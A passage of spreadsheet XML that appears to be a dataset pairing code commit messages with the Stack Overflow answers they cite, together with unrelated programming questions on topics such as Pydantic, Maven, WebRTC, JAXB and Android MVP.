state of connected sockets.  Even though you've closed your socket, it still has lingering consequences for a couple minutes.  The reasons for this, as well as a socket flag you can set to disable the behavior (SO_REUSEADDR), are explained in the
UNIX guide socket FAQ
.
In short,
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(...)
...</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use MVVM as a pattern for my SwiftUI project.&lt;/p&gt;
&lt;p&gt;I have simple model:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Medication: Identifiable {
    let id: UUID
    let name: String
    let dosage: String
    let time: Date
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to display a list of medications I use this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var body: some View {
    NavigationView {
        VStack {
            List {
                ForEach(viewModel.medications) { med in... skipping display details
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;as we know we need &lt;code&gt;let id: UUID&lt;/code&gt; for enumeration here &lt;code&gt;ForEach(viewModel.medications)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This is how I add medication:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private func addMedication() {
        let newMedication = Medication(id: UUID(), name: name, dosage: dosage, time: time)
        viewModel.addMedication(newMedication)
        presentationMode.wrappedValue.dismiss()
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that initializer wants me to pass id: UUID() when creating &lt;code&gt;Medication&lt;/code&gt; struct. But I actually need to save this medication data to &lt;code&gt;Core Data&lt;/code&gt; which uses the unique &lt;code&gt;NSManagedObjectId&lt;/code&gt; meaning I don't need UUID in sqlite records.&lt;/p&gt;
&lt;p&gt;Potential risk if we store &lt;code&gt;UUID&lt;/code&gt; in &lt;code&gt;Core Data&lt;/code&gt; and work with this property using Medication &lt;code&gt;struct&lt;/code&gt; is duplicating &lt;code&gt;id&lt;/code&gt; but &lt;code&gt;NSManagedObjectId&lt;/code&gt; only &lt;code&gt;GET&lt;/code&gt; property and we can compromise it.&lt;/p&gt;
&lt;p&gt;The question is how to actually make it logically correct as we have two types of id: &lt;code&gt;UUID&lt;/code&gt; and &lt;code&gt;NSManagedObjectId&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;To give you more context so I have a manager which save this &lt;code&gt;Medication&lt;/code&gt; data to &lt;code&gt;Core Data&lt;/code&gt; storage:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;func saveMedication(_ medication: Medication, completion: @escaping (Bool) -&amp;gt; Void) {
        let medicationEntity = MedicationEntity(context: context)
        medicationEntity.name = medication.name
        medicationEntity.dosage = medication.dosage
        medicationEntity.time = medication.time
        do {
            try context.save()
            print(&amp;quot;âœ… Medication saved successfully!&amp;quot;)
            completion(true)
        } catch {
            print(&amp;quot;âŒ Failed to save medication: \(error.localizedDescription)&amp;quot;)
            completion(false)
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For sure I can extend &lt;code&gt;Medication&lt;/code&gt; struct like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Medication: Identifiable {
        let id: UUID
        let objectId: NSManagedObjectID // or String type
        let name: String
        let dosage: String
        let time: Date
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or even store &lt;code&gt;NSManagedObejct&lt;/code&gt;, but I want to make model for my MVVM as simple as I can, but the problem of two identifiers is adding a mess to my ideal world.&lt;/p&gt;
&lt;p&gt;I mean I like version just with one id but I guess it's not save to use &lt;code&gt;UUID&lt;/code&gt; instead of &lt;code&gt;NSManagedObjectId&lt;/code&gt; to work with records, let's say I will need to update or remove medication from the list I need to know at least identifier or store &lt;code&gt;NSManagedObject&lt;/code&gt; which overload my simple model layer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C792</t>
  </si>
  <si>
    <t>do not reuse Response objects (see: https://stackoverflow.com/questions/38484752/jersey-throws-npe-for-each-call-after-using-containerrequestcontext-abortwith)</t>
  </si>
  <si>
    <t>In case anyone would ever face the same issue I had here's the answer:
you cannot re-use Responses! The output stream writer's instance is bound to the Request and as soon as you use it in abortWith() the stream will be committed forever. As such it can no longer be used to send responses.
You need to initialize a new Request from within the
filter()
method.
in simple terms, do not use such constructs:
private static final Response ACCESS_FORBIDDEN = Response.status(Response.Status.FORBIDDEN)
            .entity("Access blocked for all users !!").build();
btw, I've picken up this broken piece of code here:
http://howtodoinjava.com/jersey/jersey-rest-security/
So be wary when implementing this RequestFilter.</t>
  </si>
  <si>
    <t xml:space="preserve">Question might be tricky (because of its nature or my way of describing it), so really read this before answering.  
I have this app to write:
a) desktop app;
b) no data layer in sense of database, files or any other repository (no need to save, store or load data);
c) app will have some computation algorithms implemented (Genetic Algorithm);
b) provides GUI which will display controls for app and computations results.  
I am thinking about using MVC pattern but I have doubts how to use it. Since I have no data layer in sense of (for example) database (data is generated during execution based on user input) I am concerned about way of using MVC in this implementation. So far I have came up with two approaches:  
GUI is the View. GeneticAlgorithm is the Controller. GeneticAlgorithmResults is the Model (as class that only stores data). Basic flow:  
The View sends user input to the Controller;  
The Controller is processing user input and generates data;  
The Controller sends generated data to the Model;  
The Model notifies the View about new data;  
The View pulls new Data and updates the display.  
GUI is the View. AppEngine is the Controller. GeneticAlgorithm nad GeneticAlgorithmResults are the Model. Now we have:  
The View sends user input to the Controller;  
The Controller is processing user input and sends control signals to the Model.  
The Model updates its internal state (generates new data);  
The Model notifies the Controller about new data;  
The Controller pulls data to model;  
The Controller processes data;  
The controller pushes processed data to the View;  
The View updates the display.  
First approach seems to be more straightforward and more like MVC. The problem is that some logic would have to be in the Model - decide when to notify the model as not all data updates will be displayed, or maybe display will be updated with the sets of data not every little change. Those decisions will be based on user input. Whats more some additional processing of the data may be needed before actual display. This would be in the View.
On the other hand second approach seems to be more complicated and looks like to much messages are being passed to achieve the task. But it gives full control of Logic to the Controller and separates responsibilities of the View, the Controller and the Model (which is the main purpose of MVC).  
Which approach would you recommend? Or maybe I should mix them and use first approach architecture with communication flow from second approach? Or some different design?
</t>
  </si>
  <si>
    <t>C793</t>
  </si>
  <si>
    <t>Small optimization: Reuse the StringBuilder's buffer
See https://stackoverflow.com/questions/5192512/how-can-i-clear-or-empty-a-stringbuilder</t>
  </si>
  <si>
    <t>Two ways that work:
Use
stringBuilderObj.setLength(0)
.
Allocate a new one with
new StringBuilder()
instead of clearing the buffer. Note that for performance-critical code paths, this approach can be significantly slower than the
setLength
-based approach (since a new object with a new buffer needs to be allocated, the old object becomes eligible for GC etc).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some issue when I have setRemoteDescription, And the message showing like this:
&amp;quot;Failed to set remote answer sdp: The order of m-lines in answer doesn't match order in offer. Rejecting answer.&amp;quot;&lt;/p&gt;
&lt;p&gt;And here is my full code:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;My initializePeerConnectionFactory on mainActivity&lt;/p&gt;
&lt;p&gt;private fun initializePeerConnectionFactory() {
// Create initialization options for the PeerConnectionFactory
val eglBaseContext = EglBase.create().eglBaseContext
val options = PeerConnectionFactory.Options()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  // Initialize WebRTC PeerConnectionFactory
  PeerConnectionFactory.initialize(
      PeerConnectionFactory.InitializationOptions.builder(applicationContext)
          .setFieldTrials(&amp;quot;WebRTC-H264HighProfile/Enabled/&amp;quot;).createInitializationOptions()
  )
  // Create PeerConnectionFactory once initialization is done
  peerConnectionFactory = PeerConnectionFactory.builder()
      .setOptions(options)
      .createPeerConnectionFactory()
  if (peerConnectionFactory == null) {
      println(&amp;quot;PeerConnectionFactory initialization failed.&amp;quot;)
      return
  } else {
      println(&amp;quot;PeerConnectionFactory initialized successfully.&amp;quot;)
      generateSdpOffer()
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;My generateSdpOffer on initializePeerConnectionFactory&lt;/p&gt;
&lt;p&gt;private fun generateSdpOffer() {
if (peerConnectionFactory == null) {
return
}
val mediaConstraints = MediaConstraints().apply {
mandatory.add(MediaConstraints.KeyValuePair(&amp;quot;OfferToReceiveAudio&amp;quot;, &amp;quot;true&amp;quot;))
mandatory.add(MediaConstraints.KeyValuePair(&amp;quot;OfferToReceiveVideo&amp;quot;, &amp;quot;true&amp;quot;))
}&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  val config = PeerConnection.RTCConfiguration(iceServers)
  // Initialize the PeerConnection
  peerConnection =
      peerConnectionFactory?.createPeerConnection(config, object : PeerConnection.Observer {
          override fun onIceCandidate(candidate: IceCandidate?) {}
          override fun onIceCandidatesRemoved(p0: Array&amp;lt;out IceCandidate&amp;gt;?) {}
          override fun onAddStream(stream: MediaStream?) {
              stream?.let { mediaStream -&amp;gt;
                  if (mediaStream.videoTracks.isEmpty().not()) {
                      mediaStream.videoTracks[0].addSink { remoteRenderer }
                  }
              }
          }
          override fun onRemoveStream(stream: MediaStream?) {}
          override fun onDataChannel(channel: DataChannel?) {}
          override fun onRenegotiationNeeded() {}
          override fun onIceConnectionChange(newState: PeerConnection.IceConnectionState?) {}
          override fun onIceConnectionReceivingChange(p0: Boolean) {}
          override fun onIceGatheringChange(newState: PeerConnection.IceGatheringState?) {}
          override fun onSignalingChange(newState: PeerConnection.SignalingState?) {
              Log.e(&amp;quot;SignalState&amp;quot;, &amp;quot;onSignalStateChange ${newState?.name}&amp;quot;)
          }
      })
  // Create SDP offer
  peerConnection?.createOffer(object :
      SdpObserver {
      override fun onCreateSuccess(sdp: SessionDescription?) {
          val modifiedSdp = sdp?.description?.replace(
              &amp;quot;m=video 0 UDP/TLS/RTP/SAVPF 0&amp;quot;, &amp;quot;m=video 9 UDP/TLS/RTP/SAVPF 125&amp;quot;
          )
          val codecLines = &amp;quot;&amp;quot;&amp;quot;
               a=rtpmap:125 H264/90000
           &amp;quot;&amp;quot;&amp;quot;.trimIndent()
          // Append the codec lines to the SDP
          finalSdp = modifiedSdp + codecLines
          println(&amp;quot;finaSdp-=-=-=-=$finalSdp&amp;quot;)
          Log.e(&amp;quot;TAG&amp;quot;, &amp;quot;finaSdp-=-=-=-=${finalSdp}&amp;quot;)
          var modifiedSessionDescription =
              SessionDescription(SessionDescription.Type.OFFER, finalSdp)
          //val resultSetLocalDescription = peerConnection?.setLocalDescription(this, modifiedSessionDescription)
          peerConnection?.setLocalDescription(modifiedSessionDescription.let {
              object : SdpObserver {
                  override fun onCreateSuccess(p0: SessionDescription?) {
                      println(&amp;quot;resultSetLocalDescription onCreateSuccess: $p0&amp;quot;)
                  }
                  override fun onSetSuccess() {
                      println(&amp;quot;resultSetLocalDescription onSetSuccess000000:${modifiedSessionDescription.description}&amp;quot;)
                  }
                  override fun onCreateFailure(p0: String?) {
                      println(&amp;quot;resultSetLocalDescription onCreateFailure: $p0&amp;quot;)
                  }
                  override fun onSetFailure(p0: String?) {
                      println(&amp;quot;resultSetLocalDescription onSetFailure: $p0&amp;quot;)
                  }
              }
          })
          println(&amp;quot;modifiedSessionDescription=-=-=-=-: ${modifiedSessionDescription.description}&amp;quot;)
          sendOfferToServer(modifiedSessionDescription)
      }
      override fun onCreateFailure(error: String?) {
          Log.e(&amp;quot;SDP Offer&amp;quot;, &amp;quot;Error creating SDP offer: $error&amp;quot;)
      }
      override fun onSetSuccess() {
          println(&amp;quot;modifiedSessionDescription=-=-=-=-: ${modifiedSessionDescription?.description}&amp;quot;)
      }
      override fun onSetFailure(error: String?) {
          Log.e(&amp;quot;SDP Offer&amp;quot;, &amp;quot;Error setting SDP: $error&amp;quot;)
      }
  }, mediaConstraints)
  println(&amp;quot;mediaConstraints: $mediaConstraints&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;My sendOfferToServer&lt;/p&gt;
&lt;p&gt;private fun sendOfferToServer(it: SessionDescription) {
println(&amp;quot;Information of finalSdp: $finalSdp&amp;quot;)
Log.e(&amp;quot;SOCKET=-=-=-=&amp;quot;, &amp;quot;${it.description}&amp;quot;)
val client = OkHttpClient()
val request = Request.Builder().url(streamUrl).header(&amp;quot;Content-Type&amp;quot;, &amp;quot;application/sdp&amp;quot;)
.post(it.description.toString().toRequestBody()).build()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  client.newCall(request).enqueue(object : Callback {
      override fun onResponse(call: Call, response: Response) {
          Log.e(&amp;quot;WebRTC&amp;quot;, &amp;quot;fetchSDPFromWHEP-=-=: ${response.body?.toString()}&amp;quot;)
          val sdpResponse = response.body.toString()
          response.body.use { responseBody -&amp;gt;
              val sdpResponse = responseBody?.string()
              Log.e(&amp;quot;WebRTC&amp;quot;, &amp;quot;Response Body: $sdpResponse&amp;quot;)
              //val sessionDescription = SessionDescription(SessionDescription.Type.ANSWER, sdpResponse)
              val sessionDescription = SessionDescription(
                  SessionDescription.Type.ANSWER, BaseConvertAnswerSdp().convertAnswerSdp(
                      finalSdp!!, sdpResponse
                  )
              )
              println(&amp;quot;Information on sessionDescription: ${sessionDescription.description}&amp;quot;)
              setRemoteDescription(sessionDescription)
          }
          println(&amp;quot;Information on Response: $sdpResponse&amp;quot;)
          //  setRemoteDescription(SessionDescription(SessionDescription.Type.ANSWER, response.toString()))
          /*response.body?.string()?.let { sdpResponse -&amp;gt;
              Log.e(&amp;quot;WebRTC 900909090&amp;quot;, sdpResponse)
              // setRemoteDescription(SessionDescription(SessionDescription.Type.ANSWER, sdpResponse))
          } ?: {
              Log.e(&amp;quot;WebRTC&amp;quot;, &amp;quot;Empty SDP response&amp;quot;)
          }*/
      }
      override fun onFailure(call: Call, e: IOException) {
          Log.e(&amp;quot;WebRTC&amp;quot;, &amp;quot;Failed to fetch SDP: ${e.message}&amp;quot;)
      }
  })
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;My setRemoteDescription&lt;/p&gt;
&lt;p&gt;private fun setRemoteDescription(sessionDescription: SessionDescription) {
println(&amp;quot;Received SDP setRemoteDescription: ${sessionDescription.description}&amp;quot;)
val signalingState = peerConnection?.signalingState()
println(&amp;quot;signalingState: ${signalingState?.name}&amp;quot;)
peerConnection?.let {
Log.e(&amp;quot;SDP Answer&amp;quot;, &amp;quot;PeerConnection State: ${it.signalingState()}&amp;quot;)
it.setRemoteDescription(sessionDescription.description.let {
object : SdpObserver {
override fun onSetSuccess() {
Log.e(&amp;quot;SDP Answer onSetSuccess&amp;quot;, &amp;quot;Remote description set successfully&amp;quot;)
}&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;              override fun onSetFailure(error: String?) {
                  Log.e(
                      &amp;quot;SDP Answer onSetFailure&amp;quot;,
                      &amp;quot;Failed to set remote description onSetFailure: $error&amp;quot;
                  )
              }
              override fun onCreateSuccess(sdp: SessionDescription?) {
                  Log.e(
                      &amp;quot;SDP Answer onCreateSuccess&amp;quot;,
                      &amp;quot;Failed to set remote description onCreateSuccess: $sdp&amp;quot;
                  )
              }
              override fun onCreateFailure(error: String?) {
                  Log.e(
                      &amp;quot;SDP Answer onCreateFailure&amp;quot;,
                      &amp;quot;Failed to set remote description onCreateFailure: $error&amp;quot;
                  )
              }
          }
      }, sessionDescription)
  } ?: Log.e(&amp;quot;SDP Answer&amp;quot;, &amp;quot;PeerConnection is null!&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C794</t>
  </si>
  <si>
    <t>feat: refactor streamlit frontend ui (#23)
* Complete basic structure for Whisper App (#1)
* feat(cfg): :sparkles: add bare example config files
* chore(cfg): update to track example config files while ignoring others
* chore(cfg): add VSCode settings for conventional commits
* docs: add README for distributed chat system project, outlining objectives, requirements, and technology stack
* chore(deps): add loguru dependency and create lock file for package management
* feat: add environment configuration module for logging settings
* feat: implement centralized logging configuration module using Loguru
* chore(deps): add ruff as an optional development dependency
Ruff should be configured as the default formatter for python source code in this project.
* chore(deps): add pre-commit as optional dev dependencies
* chore(cfg): add pre-commit configuration for Ruff linter and formatter
* docs: add CONTRIBUTING.md with pre-commit setup instructions
* chore(cfg): add logs directory to .gitignore to exclude log files
* chore(deps): add pyright as optional development dependencies
* chore(cfg): configure Pyright for type checking and set Python version to 3.12
* chore(deps): add pytest and its dependencies to development requirements
* chore(cfg): add pytest configuration for test discovery
* docs(tests): add README.md to outline testing directory structure and future testing plans
* chore(tests): add logot as a development dependency with pytest support
* chore(cfg): update pytest configuration to include logot capturer and system capture options
* tests: add comprehensive unit tests for logging functionality
* chore(deps): add pytest-cov as development dependencies
* chore(cfg): enhance pytest and coverage configuration for improved test reporting and coverage metrics
* fix: add pragma comment to setup_logging function to exclude from coverage tests
* chore(cfg): add entries for test coverage files to be ignored
* docs(CONTRIBUTING): add pytest testing instructions and coverage report details
* ci: add GitHub Actions workflow for Python CI with testing, linting, and type checking
* chore(cfg): add Pyright for type checking to pre-commit configuration
* feat: implement common error codes and messages with unit tests
* docs: add error codes documentation for chat application
* chore(deps): add pydantic and its dependencies to project configuration
* feat(protocol): implement chat protocol with message types, payloads, and utility functions
* docs(protocol): add user authentication and management protocol documentation including registration, login, and logout message types and payloads
* style: remove commented-out enum classes for conversation types, encrypted content types, and error categories
* chore(.gitignore): add system files to ignore list
* fix(protocol): add ErrorResponseMessage to message union for improved error handling
* fix(protocol): set default values for optional public key fields in payloads
This is due to Pydantic v2 changed its behavior of `Optional` to a more strict and correct one. See https://stackoverflow.com/questions/76690463/pydantic-2-0-ignores-optional-in-schema-and-requires-the-field-to-be-available for more info.</t>
  </si>
  <si>
    <t xml:space="preserve">I build an app with following layers:
WEB presentation layer 
Business Logic Layer - BLL - called from WEB UI through HTTP web services
WindowsService - Runtime - called from BLL through net.pipe
BLL can also be called from 3rd party for integration into other customer's systems.
Let's say that there is an validation error that happens in the Runtime or even BLL. Where would be better to put translations: 
in the exception message - means
that we must send UICulture from WEB
layer to lower layers
BLL and Runtime are returning error
codes or custom Exception derived
types and translation is performed
in WEB UI layer
some other method
What is the best practice for supporting multiple languages in SOA architectures ?
EDIT:
I should probably use the term tiers instead of layers. 
WEB UI tier is implemented in ASP.NET web forms and will be deployed on server A under IIS. 
BLL and Runtime will be deployed on server B but are separated by process boundaries (BLL runs under ASP.NET worker process because of WCF services and Runtime runs as separated windows service process).
</t>
  </si>
  <si>
    <t>Indeed Pydantic v2 changed the behavior of
Optional
to a more strict and correct one. The
Pydantic 2.0 Migration Guide
has a special section describing the new behavior.
According to the Guide
Optional[str]
is now treated as required but allowed to have
None
as its value. See the example:
from pydantic import BaseModel
class Model(BaseModel):
    value: Optional[str]
m = Model(value='abc')  # passes
m = Model(value=None)  # passes
m = Model()  # fails
Think of
Optional[str]
as of
str | None
. And in general
A | B
requires the value to be of type
A
or
B
.
For the value to be not required it has to have a default value like in the following example:
from pydantic import BaseModel
class Model(BaseModel):
    value: str | None = 'nothing'
m = Model(value='abc')  # passes
m = Model(value=None)  # passes
m = Model()  # passes and sets `value` to `'nothing'`
If you'd change
value: str | None = 'nothing'
to
value: str | None = None
you'll get a value that is not required and has a default value
None
.</t>
  </si>
  <si>
    <t>C795</t>
  </si>
  <si>
    <t>request #11115 Include tuleap username in request headers
This way the information ca be reused in nginx logs.
See https://stackoverflow.com/a/26295135
Change-Id: I7add76c31d4ee5dd6d02299a0599473aeaecc11a</t>
  </si>
  <si>
    <t>Also need usertrack extension (which is readily available in apache) for nginx or similar alternative of it.
http://nginx.org/en/docs/http/ngx_http_userid_module.html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;version: &amp;quot;3.7&amp;quot;
services:
  mysql:
    image: mysql:5.7
    container_name: mysql
    environment:
      MYSQL_ROOT_PASSWORD: rootpassword
      MYSQL_DATABASE: typo3
      MYSQL_USER: root
      MYSQL_PASSWORD: password
    volumes:
      - mysql-data:/var/lib/mysql
    ports:
      - &amp;quot;3308:3306&amp;quot;
  typo3:
    image: webdevops/typo3
    container_name: typo3
    environment:
      TYPO3_DB_HOST: mysql
      TYPO3_DB_PORT: 3306
      TYPO3_DB_NAME: typo3
      TYPO3_DB_USER: root
      TYPO3_DB_PASSWORD: password
    volumes:
      - typo3-data:/var/www/html
    ports:
      - &amp;quot;7070:80&amp;quot;
    depends_on:
      - mysql
    restart: always
volumes:
  mysql-data:
  typo3-data:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;1.How can I correctly install TYPO3 headless using Composer in this setup?&lt;/p&gt;
&lt;p&gt;2.How do I upgrade PHP to 8.2 in my Hetzner Cloud environment?&lt;/p&gt;
&lt;p&gt;3.Once installed, how do I access the TYPO3 REST API for headless CMS usage?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What did you try and what were you expecting?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;i tried to install headless using composer. but an error came up showing that php 8.2 is required. how install headless in  PHP 7.5.2&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C796</t>
  </si>
  <si>
    <t>Added a configuration to spring-boot-maven-plugin
SUCH CONFIGURATION IS IMPORTANT IN ORDER TO PACKAGE THE MODULE SO THAT IT CAN BE REUSED BY OTHER MODULES.
SEE THE ANSWERS TO: https://stackoverflow.com/questions/61341102/maven-doesnt-find-imported-class-from-another-module-but-intellij-does</t>
  </si>
  <si>
    <t>Finally I have found the solution. Thanks
JF Meier
and
khmarbaise
for hints.
It appeared Maven doesn't allow dependency from executable jar. This was my case. My
api
module was an executable
Spring Boot
application and not reusable library.
So, the solution was the following:
It was necessary to find the
Application.java
file in
api
module.
Add
maven-jar-plugin
with exclusion of the
Application.java
file and specification of some classifier
Making dependency in
acceptance-tests
module from the above specified classifier instead of standard jar
Plugin specification in
api
module below:
&lt;plugin&gt;
                &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;
                &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;
                &lt;executions&gt;
                    &lt;execution&gt;
                        &lt;phase&gt;prepare-package&lt;/phase&gt;
                        &lt;goals&gt;
                            &lt;goal&gt;jar&lt;/goal&gt;
                        &lt;/goals&gt;
                        &lt;configuration&gt;
                            &lt;classifier&gt;qa&lt;/classifier&gt;
                            &lt;excludes&gt;
                                &lt;exclude&gt;**/Application*&lt;/exclude&gt;
                            &lt;/excludes&gt;
                        &lt;/configuration&gt;
                    &lt;/execution&gt;
                &lt;/executions&gt;
            &lt;/plugin&gt;
Dependency in
acceptance-tests
module below:
&lt;dependency&gt;
            &lt;artifactId&gt;xxx-api&lt;/artifactId&gt;
            &lt;groupId&gt;com.xxx&lt;/groupId&gt;
            &lt;version&gt;${api.version}&lt;/version&gt;
            &lt;classifier&gt;qa&lt;/classifier&gt;
        &lt;/dependency&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I work for a large state government agency that is a tad behind the times.  Our skill sets are outdated and budgetary freezes prevent any training or hiring of new employees/consultants (firing people is also impossible).  Designing business objects, implementing design patterns, establishing code libraries and services, unit testing, source control, etc. are all things that you will not find being done here.  We are as much of a 0 on the Joel Test as you can possibly get.  The good news is that we can only go up from here!  
We develop desktop CRUD applications (in C++, C#, or Java) that hit the Oracle database directly through an ODBC connection.  We basically have GUI's littered with SQL statements and patchwork code.  We have been told to move towards a service-oriented n-tier architecture to prevent direct access to the database and remove the Oracle Client need on user machines.  
Is WCF the path we should be headed down?  We've done a few of the n-tier application walkthroughs (like [external-link]) and they seem easy to implement, but we just don't know enough to understand if we are even considering the right technologies.  Utilizing the .NET generated typed DataSets seems like a nice stopgap to save us month/years of work (as opposed to creating new business objects from the ground up for numerous projects).  Is this canned approach viable for a first step?
</t>
  </si>
  <si>
    <t>C797</t>
  </si>
  <si>
    <t>Improve the argument vector size calculation
The new version produces more precise results
and has been wrapped in a reusable macro.
References:
    https://stackoverflow.com/a/2745086/512904</t>
  </si>
  <si>
    <t>For positive numbers where you want to find the ceiling (q) of x when divided by y.
unsigned int x, y, q;
To round up ...
q = (x + y - 1) / y;
or (avoiding overflow in x+y)
q = 1 + ((x - 1) / y); // if x != 0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a trading bot on &lt;a href="https://liquidlaunch.app/" rel="nofollow noreferrer"&gt;Liquidlaunch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Also I can see the APIs on &lt;a href="https://liquidlaunch.gitbook.io/liquidlaunch/introduction/liquidlaunch-overview/development-and-integration" rel="nofollow noreferrer"&gt;Liquidlaunch Document&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;signature&amp;quot;: &amp;quot;0x...&amp;quot;,
  &amp;quot;signedMessage&amp;quot;: {
    &amp;quot;sender_address&amp;quot;: &amp;quot;0x...&amp;quot;,
    &amp;quot;receiver_address&amp;quot;: &amp;quot;0x...&amp;quot;,
    &amp;quot;value&amp;quot;: &amp;quot;100000&amp;quot;,
    &amp;quot;bribe&amp;quot;: &amp;quot;250000&amp;quot;,
    &amp;quot;nonce&amp;quot;: 25,
    &amp;quot;data&amp;quot;: {
        &amp;quot;action&amp;quot;: &amp;quot;AMM_BUY&amp;quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I am not sure what specific data to be used to fill the request field to send transaction for buying tokens.&lt;/p&gt;
&lt;p&gt;Can anybody help me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C798</t>
  </si>
  <si>
    <t>Make JAXBContext static to improve performance
A XmlAdapter is not a singleton in JAXB lifecyle, instantiating
a JAXBContext in each ExtensionElementAdapter is costly 😇.
The class is threadsafe and MUST be reuse: https://stackoverflow.com/questions/7400422/jaxb-creating-context-and-marshallers-cost
In our API in production, this cost us around 6% of response time based on flame graph analysis 😅.
Benchmark                        Mode  Cnt     Score    Error  Units
Marshaller.testMarshallingFeed  thrpt   25  5501,647 ± 61,776  ops/s</t>
  </si>
  <si>
    <t xml:space="preserve">We have a website that runs on two load balanced servers.  We use the ASP.Net caching to help improve performance by caching high usage data.  BUT, occasionally that data changes.  When it does, we need to clear the relevant cache items on BOTH the load balanced servers.  Does anyone have some easy to implement suggestions for how this can be done?
I know that there is software out there to manage this for you (Microsoft Velocity for one).  I also know that there are other options for having separate state servers etc.  However, for what we want they all seem like overkill.  Just a simple mechanism for clearing out specific cache items across servers is all we need for now.
Thanks for any suggestions.
</t>
  </si>
  <si>
    <t>C799</t>
  </si>
  <si>
    <t>Shift to MVP Design Pattern
The code in the app is already getting pretty messy even though there is not much features implemented. In the future when there will be a lot of action types from server, it will be very difficult to manage code base. This also makes testing of the app extremely difficult and causes various crashes and memory leaks here and there.
Suggestion -&gt; Using MVP design pattern with dagger 2 injection
@iamareebjamal 's blog http://blog.fossasia.org/the-joy-of-testing-with-mvp/ explains very nicely how MVP design pattern works and how to test the app. Also, this https://stackoverflow.com/questions/40766185/advantage-of-mvp-in-android stackoverflow answer lists advantages of using MVP design pattern.
Since, the codebase is small right now and will get huge with the development of more and more skills on server, it may be a wise decision to shift to MVP architecture</t>
  </si>
  <si>
    <t>There are two parts to your question as I see it:
Advantages of MVP in general
Advantages of MVP in Android
The general advantages that one gets from implementing MVP (or similar architectural pattern like MVC, MVVM, MVVC, etc.) are:
Clear separation of responsibilities between components. This separation allows for an easier understanding and maintenance of the code base.
Modularity. Modularity allows you to e.g. switch to a different implementation of view component in order to completely change application's UI, while all other components remain intact.
Easier testing. Since there are well defined boundaries between components, it becomes much easier to test each component in isolation (by e.g. mocking other components).
The above are general advantages of MVx on any platform. These also apply to Android, but, IMHO, in Android the gains from following MVx are higher due to the following reasons:
Android framework does not encourage developers to write a clean code (to say the least). Adhering to a clear set of practices in this case is especially important.
Unit testing is damn hard on Android (in several aspects). Therefore, having a clear boundary between components and being able to mock them out is especially important if you want the code to be testable.
If you want to go down MVP path in Android, check out these resources as well:
Why Activities in Android are not UI Elements
MVP and MVC Architectures in Android</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I cannot deploy a process or connect to receive the service tasks from zeebe gRPC API.
The cluster with Camunda 8 is working in kubernetes.Â It is a brand new cluster.
Identity is enabled and the corporate KeyCloak is used for oauth2 authentication.
Multi-tenancy is enabled.
Web UI of all components (Identity, TaskList, Operate) looks totally health.&lt;/p&gt;
&lt;p&gt;When I deploy any process model via desktop Camunda Modeler I receive the error:
&amp;quot;Expected to handle gRPC request DeployResource with tenant identifier 'TENANT-NAME', but tenant is not authorized to perform this request&amp;quot;.&lt;/p&gt;
&lt;p&gt;I tried to use tenant &lt;code&gt;&amp;lt;default&amp;gt;&lt;/code&gt; and several created by me.&lt;/p&gt;
&lt;p&gt;The same picture in python-client to gather service tasks via grpc.&lt;/p&gt;
&lt;p&gt;The steps to create the tenant and M2M account:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Created the tenant in Camunda Identity&lt;/li&gt;
&lt;li&gt;Created the application in Camunda Identity&lt;/li&gt;
&lt;li&gt;Assigned the permissions for the application (&amp;quot;Access to APIs&amp;quot;): zeebe api write:* and others.&lt;/li&gt;
&lt;li&gt;Assigned the tenant for the application&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/rEvFbrlk.jpg" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I tried built-in application &lt;code&gt;zeebe&lt;/code&gt; to connect via grpc but the same error occured.&lt;/p&gt;
&lt;p&gt;Could you please give me an idea?
Thank you for your time!&lt;/p&gt;
</t>
  </si>
  <si>
